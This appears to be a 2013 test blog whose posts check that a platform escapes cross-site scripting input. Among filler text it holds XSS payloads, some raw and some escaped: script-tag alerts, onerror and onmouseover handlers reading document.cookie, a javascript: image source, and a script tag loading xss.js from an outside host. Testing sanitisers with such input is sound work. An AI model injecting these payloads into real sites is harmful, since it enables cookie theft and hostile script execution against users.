Friday, May 31, 2013

post title <script>alert('post title executed');</script>

test  &lt;i&gt;title&lt;/i&gt;

<script>alert('post unescaped body executed');</script>

&lt;script&gt;alert('post body executed');&lt;/script&gt;

puppet.alerts_
&lt;script&gt;verifyPostTitle();&lt;/script&gt;

&lt;script&gt;window._old_alert = window.alert;window.alert = function(){window.console.log('=====16================');window.console.log('=====18================');};window.alert("hi");&lt;/script&gt;

&lt;script&gt;mockalert = function() {window.console.log('post title executed');}&lt;/script&gt;

title &lt;script&gt;puppet.window.verifyPostTitle();&lt;/script&gt;

&lt;script&gt;alert('post title executed');&lt;/script&gt;&lt;script&gt;alert('post title executed');&lt;/script&gt;&lt;script&gt;alert('post title executed');&lt;/script&gt;&lt;script&gt;alert('post title executed');&lt;/script&gt;

Wednesday, May 29, 2013

TomarDharmendra

This is a test for timeslide view script should not execute. <img src="." onerror=alert(document.cookie)>,
<IMG SRC=`javascript:alert("RSnake says, 'XSS'")`>
<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>
<script>alert('this script & should not show');
</script>,
<img src="" onerror=alert("A & B")>,
<script>alert('&');</script>
<IFRAME SRC=# onmouseover="alert(document.cookie)"></IFRAME>

Now no character restriction for labels.


Restricted characters are &<>@!.

Test post to check this.

Sunday, May 26, 2013

script test

script test dsl dfkngkldfgdf script test dsl dfkngkldfgdfscript test dsl dfkngkldfgdf script test dsl dfkngkldfgdf script test dsl dfkngkldfgdfscript test dsl dfkngkldfgdf script test dsl dfkngkldfgdfscript test dsl dfkngkldfgdf script test dslaaaaaaaaaaaaaaaaaaaascript test dsl dfkngkldfgTest link in the body

Thursday, May 23, 2013

Wednesday, May 1, 2013